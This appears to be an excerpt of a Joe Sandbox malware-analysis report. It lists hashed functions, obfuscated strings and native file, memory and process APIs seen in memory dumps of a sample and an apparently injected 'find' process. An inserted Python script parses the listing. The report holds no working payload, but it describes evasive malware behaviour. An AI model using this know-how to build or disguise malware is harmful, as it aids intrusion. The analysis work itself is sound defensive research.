                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                  • API String ID: 0-392141074
                                                                                  • Opcode ID: 3d7a44e086a9f1cc54edf68e767842bd8c68ac6fd64c1b0aac01350b4c2ff7b9
                                                                                  • Instruction ID: 322bd4322ff5c236cc752c916039385271b8f2c18d2c5c357ea698d40a802575
                                                                                  • Opcode Fuzzy Hash: 3d7a44e086a9f1cc54edf68e767842bd8c68ac6fd64c1b0aac01350b4c2ff7b9
                                                                                  • Instruction Fuzzy Hash: F2713CB1C00228AADB25DBA4CC84FFEB779FF48741F044599E608B6150EB725B488FA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AlU$D$\$e$e$i$l$n$r$r$w$x
                                                                                  • API String ID: 0-3057419545
                                                                                  • Opcode ID: 65104fb58f75e1117cf55ea95fb4edef685dd0b4c0daa4bfcb11dbd4a37e0f64
                                                                                  • Instruction ID: c9d456f2ac797b85eb3ddf5e92f4b4c4c1207fe46aa8649a8de8daba7a4cf14f
                                                                                  • Opcode Fuzzy Hash: 65104fb58f75e1117cf55ea95fb4edef685dd0b4c0daa4bfcb11dbd4a37e0f64
                                                                                  • Instruction Fuzzy Hash: 46415FB1D41218AEDB10DF94CC85BEEBBB9FF48744F10815DE608B6180DBB556488FA4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$:$A$Q$R$g$i$v$z
                                                                                  • API String ID: 0-4110582197
                                                                                  • Opcode ID: b3cc2ef84429fa47600e700c5941e51520ebaee9a6eea40694d6ad822ec85025
                                                                                  • Instruction ID: da4373e090087322b827d13cb4969c6ddf5b3fef9cba52074569716fe300009d
                                                                                  • Opcode Fuzzy Hash: b3cc2ef84429fa47600e700c5941e51520ebaee9a6eea40694d6ad822ec85025
                                                                                  • Instruction Fuzzy Hash: 8A110010D0C7CED9DB12C6BC84047AEBF715F23214F0882D9D5E56B2D2D2B94605C7A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .$P$e$i$m$o$r$x
                                                                                  • API String ID: 0-620024284
                                                                                  • Opcode ID: 1d91aef5dff2661140efb40f7c3fd32e10e9c1af89628b93aea7ac5e835f784c
                                                                                  • Instruction ID: 80c662743daa3b19344585731a005caf7d9b582f6f8499a2c2ae54cc1fe243dd
                                                                                  • Opcode Fuzzy Hash: 1d91aef5dff2661140efb40f7c3fd32e10e9c1af89628b93aea7ac5e835f784c
                                                                                  • Instruction Fuzzy Hash: 3941A9B1C40214BADB21EBA0CC44FEE777DEF54740F00859DA60DA7140EBB55B898FA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 92q$\$g-al$g-alre$re
                                                                                  • API String ID: 0-1518786521
                                                                                  • Opcode ID: 33449af82afbc51774a1d4bebbbea758dcf3b6e6180c029d309d392139d4530e
                                                                                  • Instruction ID: 7e2cf36f1506e2ce022b4c425c0345664c5cd5b0315eec86bd0e8db229644e25
                                                                                  • Opcode Fuzzy Hash: 33449af82afbc51774a1d4bebbbea758dcf3b6e6180c029d309d392139d4530e
                                                                                  • Instruction Fuzzy Hash: DEE092B1D0024CABDB00EFE8CD46BAEBB74EB05200F1049E9D9549B241E6B08A04CB81
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 5$8$9$e
                                                                                  • API String ID: 0-2726392811
                                                                                  • Opcode ID: 58c56dc894ab0c7d2f6ebd9510ca3a1306f9f62ac618956b8278adf3864205c7
                                                                                  • Instruction ID: e980884a42f21fcbfba91dd7e481313b1b9fc3cbed3eedbf1285142443ad10dc
                                                                                  • Opcode Fuzzy Hash: 58c56dc894ab0c7d2f6ebd9510ca3a1306f9f62ac618956b8278adf3864205c7
                                                                                  • Instruction Fuzzy Hash: E03132B1910219BBEF04DF94CD45BFF77B9EF08344F004199EA04A7240EB76AA458BE5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $e$k$o
                                                                                  • API String ID: 0-3624523832
                                                                                  • Opcode ID: c108b9637ea4d62419d48dbfe5d3f70675fcb9d30319d79b50b718de9ec2c588
                                                                                  • Instruction ID: 24d7e8a9ff33a0c7260bfe6adafc2b2015014c4cd6bb02440bb3c2738d439658
                                                                                  • Opcode Fuzzy Hash: c108b9637ea4d62419d48dbfe5d3f70675fcb9d30319d79b50b718de9ec2c588
                                                                                  • Instruction Fuzzy Hash: D90184B2900218ABDB14DF99DCC4BDEF7B9FF48714F048219EA19AB241E7719945CFA0
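The per-function entries above all share one layout, so they can be lifted into records by a short script. The following Python is an added example (mine, not Joe Sandbox's): it parses two of the entries above, splits the '$'-joined String ID list, and flags functions whose referenced strings are all single characters, which is what a routine that assembles strings one character at a time leaves behind in this listing. FunctionEntry, char_by_char and dump_fields are my names; the base address and the based-on-PE flag are read straight from the entry, and the reading of the other .sdmp filename fields is an assumption.

```python
"""Parser for the per-function entries of a Joe Sandbox control-flow listing.

Added example, not part of the Joe Sandbox report; helper names are mine. An entry starts at
'Memory Dump Source' and carries '• Key: value' bullets. 'String ID' and 'API ID' are '$'-joined
lists, so a string that itself contains '$' is indistinguishable from a separator; empty
fields are kept as '' rather than guessed away.
"""
import re
from dataclasses import dataclass

# Excerpt copied from the listing above: two entries, bullets exactly as printed.
LISTING = r"""
Strings
Memory Dump Source
• Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
Yara matches
Similarity
• API ID:
• String ID: (/2,$)/+2$)2,<$*(5<$*2.'$+2-$$+2/*$-$<O$-),$$-)5$.,-*$/)+2$/*<4$0<pu$2,2.$2./)$4Kur$<4/2$<KSK$<RH<$<^uh$O}zy$P0<p$Qsfu$WTHQ$Wuh3$]llp$l}e3$pp}3$rxyn$s5<_$tnsq$tnsq$u3)/$uwy<$wy<_$xsko$xyzy$y3(/$y<.,$yKy~$}z}n
• API String ID: 0-606234297
• Opcode ID: 233256df4e38f34ade6b8b4be724e10585e00c80c8c83108041821a983508e2a
• Instruction ID: 7a48e63b615d73debfc6dd815e1ca9301df07b2dc5f50292e474567751b5fb61
• Opcode Fuzzy Hash: 233256df4e38f34ade6b8b4be724e10585e00c80c8c83108041821a983508e2a
• Instruction Fuzzy Hash: FF41C0B4D0035CDEDB21CF96EA816DDBF70BB06340FA09298D5986F265C7705A82CF59
Strings
Memory Dump Source
• Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
Yara matches
Similarity
• API ID:
• String ID: $.$F$P$e$i$l$m$o$o$r$s$x
• API String ID: 0-392141074
• Opcode ID: 3d7a44e086a9f1cc54edf68e767842bd8c68ac6fd64c1b0aac01350b4c2ff7b9
• Instruction ID: 322bd4322ff5c236cc752c916039385271b8f2c18d2c5c357ea698d40a802575
• Opcode Fuzzy Hash: 3d7a44e086a9f1cc54edf68e767842bd8c68ac6fd64c1b0aac01350b4c2ff7b9
• Instruction Fuzzy Hash: F2713CB1C00228AADB25DBA4CC84FFEB779FF48741F044599E608B6150EB725B488FA1
"""

BULLET = re.compile(r"^(?:•\s*)?([^:]+):\s*(.*)$")
SOURCE = re.compile(r"^(?P<dump>\S+\.sdmp), Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")


@dataclass
class FunctionEntry:
    dump: str            # memory dump the function was lifted from
    base: int            # dump base address (the 'Offset:' field)
    based_on_pe: bool    # False: the region is not a mapped PE image, the code lives in a raw allocation
    opcode_id: str
    instruction_id: str
    instruction_fuzzy: str
    strings: list        # referenced strings ('' kept: empty string or a literal '$', undecidable)
    apis: list           # resolved imports; empty for every entry in this listing


def split_ids(value):
    return value.split("$") if value else []


def build(f):
    src = SOURCE.match(f["Source File"])
    return FunctionEntry(src["dump"], int(src["base"], 16), src["pe"] == "true",
                         f["Opcode ID"], f["Instruction ID"], f["Instruction Fuzzy Hash"],
                         split_ids(f.get("String ID", "")), split_ids(f.get("API ID", "")))


def parse_listing(text):
    entries, fields = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":          # every entry starts here
            if fields:
                entries.append(build(fields))
            fields = {}
        elif fields is not None and (m := BULLET.match(line)):
            fields[m.group(1).strip()] = m.group(2).strip()
    if fields:
        entries.append(build(fields))
    return entries


def char_by_char(entry, minimum=3):
    """True when every non-empty referenced string is a single character: the function refers to
    characters rather than words, consistent with a routine that builds strings one byte at a time."""
    chars = [s for s in entry.strings if s]
    return len(chars) >= minimum and all(len(s) == 1 for s in chars)


def dump_fields(entry):
    """Dot-separated fields of the .sdmp name. Field 3 is the base (it equals 'Offset:'); reading
    field 4 as page protection (0x40 = PAGE_EXECUTE_READWRITE) is an assumption, not documented here."""
    return entry.dump.split(".")[:-1]


if __name__ == "__main__":
    for e in parse_listing(LISTING):
        print(f"{e.opcode_id[:12]} base={e.base:#x} pe={e.based_on_pe} "
              f"strings={len(e.strings)} char_by_char={char_by_char(e)}")
```

Run it over the whole listing (not just the excerpt) to sort the entries by dump and to see which functions reference only characters; the Opcode ID and Opcode Fuzzy Hash columns are identical in every entry above, so the Instruction Fuzzy Hash is the only per-function fuzzy value worth comparing across samples.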

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.6%
                                                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                                                  Signature Coverage:1.6%
                                                                                  Total number of Nodes:443
Total number of Limit Nodes: 69

execution_graph (interactive call-graph rendering of the dump at 006C0000; the node and edge list is not reproduced here). APIs referenced by the graph nodes: RtlAllocateHeap, RtlFreeHeap, LdrLoadDll, LdrInitializeThunk, NtClose, NtAllocateVirtualMemory, NtCreateFile, NtReadFile, NtDeleteFile, CreateProcessInternalW, CreateThread, PostThreadMessageW, Sleep, SetErrorMode, GetFileAttributesW, FindFirstFileW, FindNextFileW, FindClose, CoInitialize, CoUninitialize.

Control-flow Graph

• Executed
• Not Executed

control_flow_graph (interactive basic-block rendering for the function spanning 6c9e70-6ca6d0; the block list is not reproduced here; the graph shows a single call, to 6eb360, at 6ca687).
Strings
Memory Dump Source
• Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c0000_find.jbxd
Yara matches
Similarity
• API ID:
• String ID: "\w$$=$(o$+$+$2$:$?H$D$DZ$T+$[$\$`$fq$g-$h$m$os$p9$v$w$|d$~v
• API String ID: 0-1545153448
• Opcode ID: bb23ba94595c2962f990ee4f79f3e4e11dbb0f0c4befc8e07cd7078e6d757f30
• Instruction ID: 7ff8b90d3bb68be417e1028819b017fec94193a27190711b033b8cd6aa387839
• Opcode Fuzzy Hash: bb23ba94595c2962f990ee4f79f3e4e11dbb0f0c4befc8e07cd7078e6d757f30
• Instruction Fuzzy Hash: 4B22ADB0D0526DCBEB28CF45C998BE9BBB2FB44308F1081D9C50D6B680D7B95A89DF45
APIs
• FindFirstFileW.KERNELBASE(?,00000000), ref: 006DC8B4
• FindNextFileW.KERNELBASE(?,00000010), ref: 006DC8EF
• FindClose.KERNELBASE(?), ref: 006DC8FA
Memory Dump Source
• Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c0000_find.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: a9d401fa845b0ad9cfe64d9aba2512f5c7112ee372ec6229587db5e31742dadc
• Instruction ID: 2960cb2de9f3389f533f38c14b211cf5a05d53531355e4a07a854c8110b3d32b
• Opcode Fuzzy Hash: a9d401fa845b0ad9cfe64d9aba2512f5c7112ee372ec6229587db5e31742dadc
• Instruction Fuzzy Hash: C3318271A0034DABDB60EFA0CC85FFF777DAF44754F14445DB908A6281DA70AA84DBA4
APIs
• NtCreateFile.NTDLL(?,?,5F042D88,?,?,?,?,?,?,?,?), ref: 006E9468
Memory Dump Source
• Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c0000_find.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: a7dc78b719dc9cd15489baa3544b91b2f452c5f1a3848a5b9fd1987b19d3d2d3
• Instruction ID: fbef38d8188671193e85315956b9c885bc70bfe8bc72c005122de57077285725
• Opcode Fuzzy Hash: a7dc78b719dc9cd15489baa3544b91b2f452c5f1a3848a5b9fd1987b19d3d2d3
• Instruction Fuzzy Hash: 9131C2B5A01649AFDB14DF99D881EEFB7F9EF88700F108219F918A7341D730A841CBA5
APIs
• NtReadFile.NTDLL(?,?,5F042D88,?,?,?,?,?,?), ref: 006E95B0
Memory Dump Source
• Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c0000_find.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 26da7fe65017b460ee3fec090c47ccdfb39ba2e08ec8d5d6aab7a917e6f74ca3
• Instruction ID: 503bb183adaed11d683b770a04e3b783e29284ab76cd9f4760ef80fa65d60b31
• Opcode Fuzzy Hash: 26da7fe65017b460ee3fec090c47ccdfb39ba2e08ec8d5d6aab7a917e6f74ca3
• Instruction Fuzzy Hash: 4031E3B5A00249AFCB14DF99C881EEFB7B9EF89710F108219F918A7341D730A951CFA5
APIs
• NtAllocateVirtualMemory.NTDLL(006D1F5E,?,5F042D88,00000000,00000004,00003000,?,?,?,?,?,006E81DF,006D1F5E), ref: 006E9875
Memory Dump Source
• Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c0000_find.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: 087a93d75a4b84e32af9cf21d5fb0da0d0c3dfed15466f40219d2a17887fc0ff
• Instruction ID: 93dfab83487106b4aef9ca86925b1a519b977e60e4307e73dbfa2caab9b7d516
• Opcode Fuzzy Hash: 087a93d75a4b84e32af9cf21d5fb0da0d0c3dfed15466f40219d2a17887fc0ff
• Instruction Fuzzy Hash: 4A2108B5A01349ABDB14DF99CC41EEFB7B9EF89700F10811EF918AB241D730A911CBA5
APIs
Memory Dump Source
• Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c0000_find.jbxd
Yara matches
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: 6e1897fa7b062e52745c58606a9da80ecf12c3e005416dadf326ea3f74b90c0c
• Instruction ID: e8a22d0f4b41811a0facfa69adcabc49c7f66e59fffe5f11c6f9750bc5f13321
• Opcode Fuzzy Hash: 6e1897fa7b062e52745c58606a9da80ecf12c3e005416dadf326ea3f74b90c0c
• Instruction Fuzzy Hash: 66115E716016497AD724EBA5CC42FAFB3ADDF85710F10851DF918A7282D670B9028BF5
APIs
• NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 006E9694
Memory Dump Source
• Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c0000_find.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
• Instruction ID: 804fbabeaf6bdffbde1d57f4f1183e99bffa4e7093ea06ab78d5057cb27d0c50
• Opcode Fuzzy Hash: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
• Instruction Fuzzy Hash: 60E08C362002047BD220EB5AEC41F9B77ADEFC6794F408419FA08AB282C6B1F91187F5
APIs
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a03e51cefe7872d3f5eb921f2fb6ca83339a97116bedd0dc2444cc379da76610
• Instruction ID: 7739b79ab38cc4fc1e3a5dd05478f5afb9520ec1f122ac167a8eee646d66b84f
• Opcode Fuzzy Hash: a03e51cefe7872d3f5eb921f2fb6ca83339a97116bedd0dc2444cc379da76610
• Instruction Fuzzy Hash: E8900271605800229140715888885574015D7E0381B55C015E5424554C8A158A5A5361
APIs
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 4ac95618343af3cceb3770c204df7f2430c73b371630ed1e3ee2a22fd5b321ce
• Instruction ID: c91c41489c6dbeb143353ce2c2b3e1379c89142a7dc2914d49c0b4b81333011b
• Opcode Fuzzy Hash: 4ac95618343af3cceb3770c204df7f2430c73b371630ed1e3ee2a22fd5b321ce
• Instruction Fuzzy Hash: FA9002A1601500524140715888084176015D7E1381395C119A5554560C861989599269
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 40b4e426c641de10d74f2e7f8143e822a7fe089a7f20ae107f2def0b5e308659
                                                                                  • Instruction ID: 7de685362459f36af8abea0f67d18edfab4ff4c5ecd1a55534bd0166b45c483c
                                                                                  • Opcode Fuzzy Hash: 40b4e426c641de10d74f2e7f8143e822a7fe089a7f20ae107f2def0b5e308659
                                                                                  • Instruction Fuzzy Hash: E5900265221400120145B558460851B0455D7D63D1395C019F6416590CC62289695321
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 29147128e383488fc9352995b98b5d4f5548dd0fd36450c37cba28258385d707
                                                                                  • Instruction ID: 98c28dbe82a6beec0a87781e7aec6e4828bbd8e0555aceba1882b078099c8ce5
                                                                                  • Opcode Fuzzy Hash: 29147128e383488fc9352995b98b5d4f5548dd0fd36450c37cba28258385d707
                                                                                  • Instruction Fuzzy Hash: B4900475311400130105F55C470C5170057C7D53D1355C035F7015550CD733CD755131
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 5a29736b8b0e161cd86e0e06c55e466c5394126f1d3ddf9d5f6beeba9392775f
                                                                                  • Instruction ID: eb98cce755a9c25b058a6c3e0a00fb4ab0df1642940227a619dde7bc8ed5580f
                                                                                  • Opcode Fuzzy Hash: 5a29736b8b0e161cd86e0e06c55e466c5394126f1d3ddf9d5f6beeba9392775f
                                                                                  • Instruction Fuzzy Hash: B590027120140812D1807158840865B0015C7D1381F95C019A5025654DCA168B5D77A1
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: d3dd5c4f9fbe7faa96f440213c75d1afffc946f9b8126f22009bcf4dad6cb44a
                                                                                  • Instruction ID: 89a3c2d78a0a6ceb4ac2057b31f4e7ea35b98db82cd3bb27d6ad33adfb2b772f
                                                                                  • Opcode Fuzzy Hash: d3dd5c4f9fbe7faa96f440213c75d1afffc946f9b8126f22009bcf4dad6cb44a
                                                                                  • Instruction Fuzzy Hash: 8F90027120544852D14071588408A570025C7D0385F55C015A5064694D96268E59B661
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 321ab38c005c3c84fba2d1eb6ffd7e1f8d4475ea7033ff6588c1fcbb0033917b
                                                                                  • Instruction ID: 4fa97e9be4aefabeafca2329e5a85b750fdea643ae824063e2ec48dab5c1ae37
                                                                                  • Opcode Fuzzy Hash: 321ab38c005c3c84fba2d1eb6ffd7e1f8d4475ea7033ff6588c1fcbb0033917b
                                                                                  • Instruction Fuzzy Hash: DB90027160540812D150715884187570015C7D0381F55C015A5024654D87568B5976A1
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a2a84bc78bc7796fab709d5ab682f3cef0fcfdead3a97fa8393fa7516b4dee23
                                                                                  • Instruction ID: 65482c9b0b652e7dcc5a0f27c4f8d511055fbb2e0967d2417f352881fed67827
                                                                                  • Opcode Fuzzy Hash: a2a84bc78bc7796fab709d5ab682f3cef0fcfdead3a97fa8393fa7516b4dee23
                                                                                  • Instruction Fuzzy Hash: C29002A120240013410571588418627401AC7E0281B55C025E6014590DC52689956125
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 58379faf74a51e468f35f462814214f6b2e91b526020fe83cf85c29b13639329
                                                                                  • Instruction ID: 32400a6bbb5abb7cba4e54b87e49f1f87c53197ffd700f3cc1584bd865ec5323
                                                                                  • Opcode Fuzzy Hash: 58379faf74a51e468f35f462814214f6b2e91b526020fe83cf85c29b13639329
                                                                                  • Instruction Fuzzy Hash: A29002A120180413D140755888086170015C7D0382F55C015A7064555E8A2A8D556135
                                                                                  APIs
